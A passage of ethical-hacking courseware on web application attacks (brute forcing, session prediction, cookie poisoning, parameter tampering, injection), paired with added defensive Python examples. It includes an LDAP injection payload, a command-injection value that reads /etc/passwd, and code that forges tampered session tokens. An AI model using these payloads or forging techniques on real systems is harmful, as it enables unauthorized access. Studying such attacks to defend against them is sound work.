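    r"src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>FAIL|SUCCESS)$"
)


def parse_line(line):
    """Return a dict for one well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
    return ev


def detect_guessing(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag (source, user) pairs with at least `threshold` failures inside a
    sliding time window; record the peak count and whether a success followed
    the burst, which is the signal that the guess may have worked."""
    recent = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    flagged = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["src"], ev["user"])
        q = recent[key]
        if ev["result"] == "FAIL":
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                entry = flagged.setdefault(
                    key, {"first": q[0], "failures": 0, "success_after": False})
                entry["failures"] = max(entry["failures"], len(q))
        elif key in flagged:
            flagged[key]["success_after"] = True
    return flagged


if __name__ == "__main__":
    for (src, user), info in detect_guessing(SAMPLE_LOG).items():
        verdict = "COMPROMISE LIKELY" if info["success_after"] else "attempt"
        print(f"{src} -> {user}: {info['failures']} failures since {info['first']} ({verdict})")
```

Keying on the (source, user) pair catches the single-account run shown in the figure; a spray across many accounts from one source needs the same window keyed on the source alone, which is a one-line change to `key`.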


Password Attacks: Brute Forcing


Brute force is one of the methods used for cracking passwords. In a brute force attack, attackers crack login passwords by trying all possible values from a set of alphabetic, numeric, and special characters. The main limitation of the brute force attack is that it is only practical against short passwords, e.g. those of two characters. Guessing becomes much harder when the password is longer and when it mixes upper- and lower-case letters. If numbers and symbols are used as well, it might take more than a few years to guess the password, which is practically impossible. Password cracking tools commonly used by attackers include Burp Suite's Intruder, Brutus, Sensepost's Crowbar, etc.

Burp Suite's Intruder

Source: http://portswigger.net

Burp Intruder is a module of Burp Suite. It enables the user to automate penetration testing of web applications.


[Figure residue: Burp Suite Free Edition v1.4.01, Intruder tab, payloads sub-tab. Recoverable content: payload set 1, payload type "brute forcer", character set abcdefghijklmnopqrstuvwxyz0123456789, number of payloads 1,679,616, number of requests 8,398,080, a max length setting, and a "to uppercase" entry under payload processing rules.]

FIGURE 13.42: Burp Suite's Intruder Tool Screenshot

Brutus

Source: http://www.hoobie.net

Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.

[Figure residue: Brutus AET2 (www.hoobie.net/brutus, January 2000) screenshot. Recoverable content: Type HTTP (Basic Auth), Target 127.0.0.1; Connection Options with Port, 10 Connections, Timeout 10 and a Use Proxy option; HTTP (Basic) Options with Method HEAD and KeepAlive; Authentication Options with Use Username, User File users.txt, Pass Mode Word List, Pass File words.txt; log lines "Opened user file containing 6 users", "Opened password file containing 818 Passwords" and "Maximum number of authentication attempts will be 4908"; a Positive Authentication Results table with Target, Type, Username and Password columns; status counters Timeout, Reject, Auth Seq, Throttle, Quick Kill.]

FIGURE 13.43: Brutus Tool Screenshot


Session Attacks: Session ID Prediction/Brute Forcing


Every time a user logs in to a particular website, a session ID is given to the user. This session ID is valid until the session is terminated, and a new session ID is provided when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid session IDs. In the first step, the attacker collects some valid session ID values by sniffing traffic from authenticated users. Attackers then analyze the captured session IDs to determine the session ID generation process: the structure of the session ID, the information used to create it, and the encryption or hash algorithm the application uses to protect it. In addition, the attacker can use a brute force technique to generate and test different values of the session ID until he or she successfully gets access to the application.


Vulnerable session generation mechanisms that use session IDs composed from the user name or other predictable information, like a timestamp or the client IP address, can be exploited by easily guessing valid session IDs.

Request:

GET http://janaina:8180/WebGoat/attack?Screen=17&menu=410 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Referer: http://janaina:8180/WebGoat/attack?Screen=17&menu=410
Cookie: JSESSIONID=user01          <- Predictable Session Cookie
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

FIGURE 13.44: Session ID Prediction/Brute Forcing

For certain web applications, the session ID is a string of fixed width. Randomness is essential in order to avoid prediction. From the diagram you can see that the session ID variable is indicated by JSESSIONID and that its value is "user01," which corresponds to the user name. By guessing a new value for it, say "user02," it is possible for the attacker to gain unauthorized access to the application.
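The analysis step described above (collect session IDs, look at their structure and the information they encode) is also the test a development team should run on its own session generator before an attacker does. The following Python example is added here and is not part of the EC-Council courseware or of WebGoat. It scores a sample of session IDs with two cheap checks, an upper bound on entropy from alphabet size and length, and a search for counter-style sequences like user01, user02, and shows a generator that draws the ID from the operating system's CSPRNG. The thresholds and the sample IDs are constructed.

```python
import math
import re
import secrets


def new_session_id(nbytes=32):
    """Issue a session ID from the OS CSPRNG: 32 random bytes, URL-safe encoded.
    Nothing about the user, the time or the client address goes into it."""
    return secrets.token_urlsafe(nbytes)


_NUM_SUFFIX = re.compile(r"^(.*?)(\d+)$")


def sequential_ids(ids):
    """Count IDs that share a prefix with another ID and differ by a +1 counter,
    the pattern behind JSESSIONID=user01 / user02 in Figure 13.44."""
    by_prefix = {}
    for sid in ids:
        m = _NUM_SUFFIX.match(sid)
        if m:
            by_prefix.setdefault(m.group(1), set()).add(int(m.group(2)))
    return sum(1 for nums in by_prefix.values() for n in nums if n + 1 in nums)


def entropy_upper_bound(ids):
    """log2(alphabet actually used) * shortest ID length. A low number proves
    the IDs are weak; a high number only fails to prove it (the generator could
    still be predictable), so treat it as a first filter, not a certificate."""
    alphabet = set("".join(ids))
    shortest = min(len(s) for s in ids)
    return math.log2(len(alphabet)) * shortest if len(alphabet) > 1 else 0.0


def assess(ids, min_bits=64):
    """Return {'weak': bool, 'bits': float, 'reasons': [...]} for a sample of IDs.
    min_bits=64 is an assumed threshold for this example."""
    reasons = []
    bits = entropy_upper_bound(ids)
    if bits < min_bits:
        reasons.append(f"at most {bits:.0f} bits of entropy (< {min_bits})")
    seq = sequential_ids(ids)
    if seq:
        reasons.append(f"{seq} IDs continue a counter sequence")
    if len(set(ids)) != len(ids):
        reasons.append("duplicate IDs issued")
    return {"weak": bool(reasons), "bits": bits, "reasons": reasons}


if __name__ == "__main__":
    # Constructed sample modelled on the figure, then a sample from the generator.
    print(assess(["user01", "user02", "user03", "user07"]))
    print(assess([new_session_id() for _ in range(20)]))
```

The two checks catch the classes of weakness the text names (IDs built from the user name, a counter, a timestamp); they say nothing about a generator that is merely seeded badly, which needs a larger sample and statistical tests.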


Cookie Exploitation: Cookie Poisoning

If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping

Attackers then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication

Attackers can trap cookies using tools such as OWASP Zed Attack Proxy, Burp Suite, etc.

[Figure residue: OWASP ZAP "Untitled Session" window showing an intercepted request in the Request/Response pane, with History, Search, Alerts, Spider and Active Scan tabs; https://www.owasp.org]

Cookie Exploitation: Cookie Poisoning

Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or on its hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode them. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security. If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping. Attackers then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication. Examples of tools used by the attacker for trapping cookies include OWASP Zed Attack Proxy, Burp Suite, etc.

OWASP Zed Attack Proxy

Source: https://www.owasp.org

OWASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
[Figure residue: OWASP ZAP "Untitled Session" window. Recoverable content: a Sites tree containing http://tr.adinterax.com; Request/Response/Break panes showing a captured GET request to http://in.yahoo.com/ with User-Agent Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4, Accept, Referer, Cache-Control, Accept-Encoding, Accept-Language and Accept-Charset headers, a Cookie header carrying an adxid value, and Host tr.adinterax.com; tabs History, Active Scan, Spider, Search, Brute Force, Break Points, Port Scan, Fuzzer, Alerts, Params and Output; Site tr.adinterax.com:80, Current Scans 0, Alerts 0.]

Figure 13.45: OWASP Zed Attack Proxy Tool Screenshot
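The "Remember Me Exploit" passage (a cookie such as RememberUser=jason, forged from an enumerated user name) and the cookie poisoning passage above (Base64 or ROT13 encoding mistaken for protection) describe the same defect: the server trusts a value the client can rewrite. The following Python example is added here and is not part of the EC-Council courseware or of OWASP ZAP. It issues a remember-me value whose contents are bound by an HMAC over a server-side key, so that altering the user name, the expiry or a single bit of the encoding invalidates it, and it shows the poisoning attempt failing against that check. The key, names and timestamps are constructed.

```python
import base64
import hashlib
import hmac
import secrets
import time

# Constructed server secret. In a deployment it comes from a key store, never from
# source code, and rotating it invalidates every outstanding cookie.
SERVER_KEY = secrets.token_bytes(32)


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_remember_me(username, key=SERVER_KEY, ttl=30 * 24 * 3600, now=None):
    """Build a RememberUser cookie value: user|random selector|expiry, plus an HMAC.
    The user name is readable (encoding is not secrecy) but not forgeable."""
    if "|" in username:
        raise ValueError("separator not allowed in user name")
    now = int(time.time()) if now is None else now
    payload = f"{username}|{secrets.token_urlsafe(16)}|{now + ttl}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(tag)


def verify_remember_me(cookie, key=SERVER_KEY, now=None):
    """Return the user name if the cookie is genuine and unexpired, else None."""
    now = int(time.time()) if now is None else now
    try:
        p64, t64 = cookie.split(".", 1)
        payload, tag = _unb64(p64), _unb64(t64)
    except ValueError:            # wrong shape or not base64 (includes RememberUser=jason)
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    username, _selector, expiry = payload.decode().split("|")
    return username if now < int(expiry) else None


def poison(cookie, old_user, new_user):
    """The poisoning attempt from the text: decode, swap the user name, re-encode,
    keep the original tag. Used here only to show that verification rejects it."""
    p64, t64 = cookie.split(".", 1)
    payload = _unb64(p64).decode().replace(old_user, new_user, 1).encode()
    return _b64(payload) + "." + t64


if __name__ == "__main__":
    cookie = issue_remember_me("jason")
    print("genuine  ->", verify_remember_me(cookie))
    print("poisoned ->", verify_remember_me(poison(cookie, "jason", "admin")))
    print("plain    ->", verify_remember_me("jason"))
```

The random selector makes every issued cookie distinct, so a stolen one can be revoked individually by recording the selectors in use; the HMAC closes the poisoning path, but it does nothing against replay of a cookie captured intact, which is why the cookie must still travel only over TLS with the Secure and HttpOnly flags set.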


Web App Hacking Methodology


Authorization protects web applications by granting certain users the authority to access the application and restricting other users from doing so. Through authorization attacks, attackers try to gain access to information resources without proper credentials. The ways to attack authorization schemes are explained on the following slides.


Authorization Attack

Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc.

Attackers first access the web application using a low privileged account and then escalate privileges to access protected resources

Sources: URI, Parameter Tampering, POST Data, HTTP Headers, Query String, Cookies, Hidden Tags

Authorization Attack

In an authorization attack, the attacker first finds the lowest privileged account, logs in as an authentic user, and then slowly escalates privileges to access protected resources. Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc. The sources that attackers use to perform authorization attacks include the uniform resource identifier, parameter tampering, POST data, HTTP headers, the query string, cookies, and hidden tags.

Parameter Tampering

Parameter tampering is an attack based on the manipulation of parameters exchanged between server and client in order to modify application data such as the price and quantity of products, permissions and user credentials, etc. This information is usually stored in cookies, URL query strings, or hidden form fields, and the attacker uses it to gain greater control over the application and its functionality.

POST Data

POST data is often comprised of authorization and session information, since in most applications the information provided by the client must be associated with the session that provided it. An attacker exploiting vulnerabilities in the POST data can easily manipulate the POST data and the information in it.


HTTP Request Tampering

Attackers tamper with the HTTP request itself rather than using another user's credentials: the request is intercepted and modified (typically in an intercepting proxy) before it reaches the server.

Query String Tampering

An attacker tampers with the query string when the web application uses it to pass values between pages. If the query string is visible in the address bar of the browser, the attacker can simply edit the parameter to bypass authorization mechanisms, for example:

http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com
https://juggyshop.com/books/download/852741369.pdf
https://juggybank.com/login/home.jsp?admin=true

FIGURE 13.46: Query String Tampering

Here the mailbox and company values, the numeric document identifier, and the admin flag are all chosen by the client; changing them to another user's mailbox, an adjacent document number, or admin=true tests whether the server checks authorization on each request rather than trusting the parameter. Attackers can use web spidering tools such as Burp Suite to crawl the web app and enumerate its GET and POST parameters.

HTTP Headers

If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionality. The Referer header is filled in by the browser from the previous page, so it is entirely under the attacker's control:

GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin=False

FIGURE 13.47: HTTP Headers

ItemID=201 is not accessible because the Admin parameter in the Referer is set to False; the attacker changes it to True and, if the server trusts the header, gains access to the protected item.
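The following is an added example, not code from the CEH courseware: it models the slide's Download request as a vulnerable authorization check that honours admin=true in the query string or Admin=True in the Referer, beside a hardened check that takes the role only from server-side session state. The session table, the session IDs and the rule that ItemID 201 is admin-only are constructed assumptions.

```python
"""Added example (not from the CEH courseware): an authorization check that
trusts client-controlled request data (query string, Referer) next to one that
derives the role from server-side session state.  juggybank/juggyboy, the
ItemID and the session table are illustrative assumptions."""
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qs, urlsplit


@dataclass
class Request:
    """Minimal stand-in for an HTTP request: URL, headers and the session cookie."""
    url: str
    headers: dict = field(default_factory=dict)
    session_id: Optional[str] = None


# Constructed server-side state: session -> authenticated user and role.
SESSIONS = {
    "s-1111": {"user": "john", "role": "user"},
    "s-9999": {"user": "alice", "role": "admin"},
}
# Items that only an admin may download (ItemID 201 from the slide).
ADMIN_ONLY_ITEMS = {"201"}


def _query(url: str) -> dict:
    return parse_qs(urlsplit(url).query)


def vulnerable_can_download(req: Request) -> bool:
    """Vulnerable: honours admin=true in the query string or Admin=True in the
    Referer.  Both values are written by the client, so the attacker just edits them."""
    if _query(req.url).get("admin", ["false"])[0].lower() == "true":
        return True
    referer_admin = _query(req.headers.get("Referer", "")).get("Admin", ["False"])[0]
    return referer_admin.lower() == "true"


def hardened_can_download(req: Request) -> bool:
    """Hardened: request parameters say *what* is requested; *who* may have it
    comes only from the server-side session, which the client cannot edit."""
    session = SESSIONS.get(req.session_id or "")
    if session is None:
        return False                      # not authenticated
    item = _query(req.url).get("ItemID", [""])[0]
    if item in ADMIN_ONLY_ITEMS:
        return session["role"] == "admin"
    return True


def demo() -> dict:
    """Replays the slide's request as sent, and as tampered by the attacker."""
    base = "http://juggyboy:8180/Applications/Download?ItemID=201"
    ref = "http://juggyboy:8180/Applications/Download?Admin="
    honest = Request(base, {"Referer": ref + "False"}, "s-1111")
    tampered_referer = Request(base, {"Referer": ref + "True"}, "s-1111")
    tampered_query = Request(base + "&admin=true", {}, "s-1111")
    real_admin = Request(base, {}, "s-9999")
    return {
        "vuln_honest": vulnerable_can_download(honest),
        "vuln_tampered_referer": vulnerable_can_download(tampered_referer),
        "vuln_tampered_query": vulnerable_can_download(tampered_query),
        "hard_tampered_referer": hardened_can_download(tampered_referer),
        "hard_tampered_query": hardened_can_download(tampered_query),
        "hard_real_admin": hardened_can_download(real_admin),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {allowed}")
```

The point of the hardened version is not the particular check but where the role comes from: anything in the URL, body or headers is an input to be validated, never the authority for an access decision.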

Authorization Attack: Cookie Parameter Tampering

Cookie parameter tampering is the modification of cookies set by the web application in order to subvert the authorization decisions the application bases on them. In the first step, the attacker collects a sample of cookies set by the web application and analyzes them to determine the cookie generation mechanism (encoding, structure, and which fields carry user or role information). The attacker then intercepts the cookies set by the web application, tampers with their parameters using an intercepting proxy such as OWASP Zed Attack Proxy or Paros Proxy, and replays them to the application. Source: https://www.owasp.org


Web App Hacking Methodology

Attack Session Management Mechanism

The session management mechanism is a key security component of most web applications: it is what ties a sequence of requests to an authenticated user. Because of that role, it is a prime target. An attacker who breaks the application's session management can bypass even robust authentication controls and masquerade as another application user without knowing that user's credentials (user name, password). If the compromised session belongs to an administrative user, the attacker can take control of the entire application. The attacks on the session management mechanism are described in detail on the following slides.


Session Management Attack

A session management attack is one of the methods attackers use to compromise a web application. Attackers break the application's session management mechanism to bypass the authentication controls and impersonate a privileged application user. A session management attack involves two stages: obtaining a valid session token, and exploiting the way the application handles session tokens. In order to obtain a valid session token, the attacker performs:

Session token prediction
Session token tampering

Once the attacker holds a valid session token, he or she exploits the session token handling in the following ways:

Session hijacking
Session replay
Man-in-the-middle attack


Attacking Session Token Generation Mechanism

Attackers obtain valid session tokens and, if the generation mechanism is weak, use them to predict or construct further valid tokens.

Weak Encoding Example

https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

The SessionToken value is simply the hex (percent) encoding of the ASCII string user=jason;app=admin;date=23/11/2010. Since the token carries its meaning in the clear and no secret is involved in generating it, the attacker can construct another "valid" token by changing the date, the user name, or the app field and use it for another transaction with the server.

Session Token Prediction

Attackers obtain valid session tokens by sniffing the traffic or by legitimately logging into the application, and analyze the sample for encoding (hex-encoding, Base64) or any other pattern (sequential counters, timestamps, user-derived fields). If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the tokens recently issued to other application users. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine which of them correspond to valid sessions.
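The following is an added example, not code from the CEH courseware. It carries out the analysis and prediction steps above on the slide's own token: pulling the raw SessionToken out of the URL, decoding it to its fields, forging a sibling token with a changed date, and a small heuristic that flags a token sample which decodes to readable key=value text. The random-looking comparison token is constructed.

```python
"""Added example (not from the CEH courseware): reversing the slide's
hex-encoded session token, forging a sibling token by changing one field, and
the analysis step of checking whether a token sample decodes to readable text.
The token is the one on the slide; the random-looking comparison token is
constructed."""
import base64
import binascii
import string
from urllib.parse import unquote, urlsplit

SLIDE_URL = ("https://www.juggyboy.com/checkout?SessionToken="
             "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
             "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30")


def token_from_url(url: str) -> str:
    """Return the raw, still-encoded SessionToken parameter."""
    for pair in urlsplit(url).query.split("&"):   # parse_qs would unquote it
        name, _, value = pair.partition("=")
        if name == "SessionToken":
            return value
    raise ValueError("no SessionToken parameter")


def decode_token(token: str) -> dict:
    """Percent-decode and split the k=v;k=v structure into a dict."""
    plain = unquote(token)
    return dict(part.partition("=")[::2] for part in plain.split(";") if part)


def forge_token(fields: dict, **changes) -> str:
    """Re-encode a modified copy exactly as the application does (every byte
    percent-encoded), e.g. with another date or app value."""
    merged = {**fields, **changes}
    plain = ";".join(f"{k}={v}" for k, v in merged.items())
    return "".join(f"%{b:02X}" for b in plain.encode())


def looks_like_structured_text(token: str) -> bool:
    """Analysis heuristic: does the token percent- or Base64-decode to printable
    text with k=v structure?  If so it carries meaning an attacker can guess."""
    candidates = []
    pct = unquote(token)
    if pct != token:
        candidates.append(pct)
    try:
        candidates.append(base64.b64decode(token, validate=True).decode("ascii"))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        pass
    printable = set(string.printable)
    return any(c and set(c) <= printable and ("=" in c or ";" in c)
               for c in candidates)


if __name__ == "__main__":
    fields = decode_token(token_from_url(SLIDE_URL))
    print(fields)
    print(forge_token(fields, date="24/11/2010"))
```

A token that survives this check is not necessarily safe (a sequential integer also decodes to nothing readable); the heuristic only catches the case on the slide, where the token is an encoding rather than a random value. The fix is to issue tokens from a cryptographic random source and keep user, role and date server-side under that opaque value.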


Attacking Session Tokens Handling Mechanism: Session Token Sniffing

Attackers first sniff the network traffic for valid session tokens and then either replay a captured token directly or use it as a sample for predicting the next token. Either way, the attacker uses the stolen or predicted session ID to authenticate to the target web application as the victim, which is why capturing a valid session token is central to session management attacks. Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the Secure flag is not set, the browser also sends the cookie over plaintext HTTP connections, where the attacker can capture and replay it to gain unauthorized access to the application. Attackers can use session cookies to perform session hijacking, session replay, and man-in-the-middle attacks.

Wireshark

Source: http://www.wireshark.org

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
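The following is an added example, not code from the CEH courseware or Wireshark. Once the response headers have been captured (by Wireshark or a proxy), the check a tester runs is whether the session cookie is exposed to the attacks just listed; this audits each Set-Cookie line for the Secure, HttpOnly and SameSite attributes. The response is constructed sample data and the cookie-name hints are an assumption.

```python
"""Added example (not from the CEH courseware): auditing captured Set-Cookie
headers for the Secure, HttpOnly and SameSite attributes.  The response below
is constructed sample data."""

SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: PHPSESSID=6f1c9a7e3b; path=/
Set-Cookie: remember=1; expires=Thu, 19 Nov 2026 08:52:00 GMT; path=/; domain=.example.test
Set-Cookie: csrftoken=9b2d; path=/; Secure; HttpOnly; SameSite=Strict
"""

# Assumption: names containing these fragments usually carry session state.
SESSION_NAME_HINTS = ("sess", "sid", "token", "auth", "remember")


def parse_set_cookies(raw_response: str) -> list:
    """One dict per Set-Cookie header: name, value and a lower-cased attribute map."""
    cookies = []
    for line in raw_response.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        parts = [p.strip() for p in line.split(":", 1)[1].split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {}
        for attr in parts[1:]:
            key, _, val = attr.partition("=")
            attrs[key.strip().lower()] = val.strip()
        cookies.append({"name": name.strip(), "value": value, "attrs": attrs})
    return cookies


def audit(raw_response: str) -> dict:
    """Map each cookie name to the weaknesses an attacker could exploit."""
    findings = {}
    for cookie in parse_set_cookies(raw_response):
        attrs, issues = cookie["attrs"], []
        if "secure" not in attrs:
            issues.append("no Secure flag: sent over plaintext HTTP, sniffable and replayable")
        if "httponly" not in attrs:
            issues.append("no HttpOnly flag: readable by injected script (XSS)")
        if attrs.get("samesite", "").lower() not in ("lax", "strict"):
            issues.append("no SameSite=Lax/Strict: attached to cross-site requests (CSRF)")
        if issues and any(h in cookie["name"].lower() for h in SESSION_NAME_HINTS):
            issues.insert(0, "session-bearing cookie")
        findings[cookie["name"]] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_RESPONSE).items():
        print(name, "->", issues or "ok")
```

Run this over the Set-Cookie headers of the login response; a session cookie without Secure is the precondition for the replay described above, and a missing HttpOnly turns any cross-site scripting flaw into session theft.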


[Figure: Wireshark 1.8.2 capture window for Test(WS).pcapng. The packet list (No., Time, Source, Destination, Protocol, Length, Info) shows a TCP handshake from 10.0.0.5 to 123.108.40.33 followed by "GET /newmail/mailsignout.php HTTP/1.1" and the "HTTP/1.1 200 OK (text/html)" response; the bytes pane shows the response's Set-Cookie header with an expires value and "Cache-Control: no-store, no-cache, must-revalidate". Status bar: Packets: 2266, Displayed: 2266.]

FIGURE 13.49: Wireshark Tool Screenshot


Web App Hacking Methodology

Footprint Web Infrastructure
Analyze Web Applications
Attack Authorization Schemes
Perform Injection Attacks
Attack Web App Client
Attack Web Servers
Attack Authentication Mechanism
Attack Session Management Mechanism
Attack Data Connectivity
Attack Web Services

Web App Hacking Methodology

Perform Injection Attacks

Injection attacks are very common in web applications. There are many types: web script injection, OS command injection, SMTP injection, SQL injection, LDAP injection, and XPath injection, of which SQL injection is the most frequently encountered. Injection takes place when data supplied by the user is sent to an interpreter as part of a command or query. To launch an injection attack, the attacker supplies crafted data that tricks the interpreter into executing commands or queries that were never intended. Through injection flaws, the attacker can read, create, update, and delete arbitrary data available to the application. In some cases, the attacker can even reach through a deeply nested firewall environment and take complete control over the application and the underlying system. Each injection attack is detailed on the following slides.


Injection Attacks

In injection attacks, attackers supply crafted malicious input that is syntactically correct according to the interpreted language being used, so that it breaks out of the data context the application intended and is interpreted as code or commands.

Web Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server.

OS Commands Injection: Exploit the operating system by entering malicious input in fields whose values the application passes into a system-level command.

SMTP Injection: Inject arbitrary SMTP commands into the application's conversation with the SMTP server to generate large volumes of spam email.

SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.

LDAP Injection: Take advantage of non-validated web application input to alter LDAP filters and obtain direct access to the directory.

XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic.
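The following is an added example, not code from the CEH courseware. It shows two of the classes above, LDAP injection and OS command injection, each as the vulnerable construction beside its fix: escaping the filter metacharacters for LDAP, and validating the value then passing an argument list rather than a shell line for the OS command. The attribute names, the payload and the ping wrapper are constructed.

```python
"""Added example (not from the CEH courseware): two of the injection classes
listed above side by side, each as the vulnerable construction and its fix.
The LDAP attribute names, the login payload and the ping wrapper are
constructed for illustration."""
import ipaddress
import re

# --- LDAP injection --------------------------------------------------------
# RFC 4515: characters that change the structure of a search filter.
LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def ldap_escape(value: str) -> str:
    """Escape each special character once; a single pass cannot double-escape."""
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)


def login_filter_unsafe(user: str, password: str) -> str:
    """Vulnerable: user input is concatenated into the filter, so a value such
    as '*)(uid=*))(|(uid=*' rewrites the filter's logic."""
    return f"(&(uid={user})(userPassword={password}))"


def login_filter_safe(user: str, password: str) -> str:
    """Hardened: the same filter, with both values escaped as literals."""
    return f"(&(uid={ldap_escape(user)})(userPassword={ldap_escape(password)}))"


# --- OS command injection --------------------------------------------------
HOSTNAME = re.compile(r"[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
                      r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*")


def is_safe_host(host: str) -> bool:
    """Allow-list: an IP address literal or a plain DNS hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME.fullmatch(host))


def ping_command_unsafe(host: str) -> str:
    """Vulnerable: a shell line; ';', '|' or '$( )' in host run as commands."""
    return f"ping -c 1 {host}"          # would be handed to a shell


def ping_argv_safe(host: str) -> list:
    """Hardened: validate first, then build an argv list to run with
    subprocess.run(argv, shell=False); the host can only ever be one argument."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    payload = "*)(uid=*))(|(uid=*"
    print(login_filter_unsafe(payload, "x"))
    print(login_filter_safe(payload, "x"))
    print(ping_command_unsafe("127.0.0.1; cat /etc/passwd"))
```

The same pattern applies to the other classes on the list: keep the interpreter from ever seeing user data as syntax, either by escaping for that interpreter's grammar or, better, by an API that separates code from data (parameterised queries, argv lists, prepared XPath variables).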


Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection Attacks.


Web App Hacking Methodology

Attack Data Connectivity

Attacking the data connectivity (the way the application opens its connection to the database, rather than the queries it sends) allows the attacker to gain unauthorized control over the information in the database. The various types of data connectivity attacks, their causes, and their consequences are explained in detail on the following slides.


Attack Data Connectivity

Attackers attack data connectivity directly so that they can access sensitive information available in the database. Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries. The data connectivity attacks covered here are:

Connection String Injection
Connection String Parameter Pollution (CSPP) Attacks
Connection Pool DoS

Database connection strings are used to connect applications to database engines. An example of a common connection string used to connect to a Microsoft SQL Server database:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

Each keyword=value pair is separated from the next by a semicolon, which is exactly the property the first two attacks exploit.


Connection String Injection

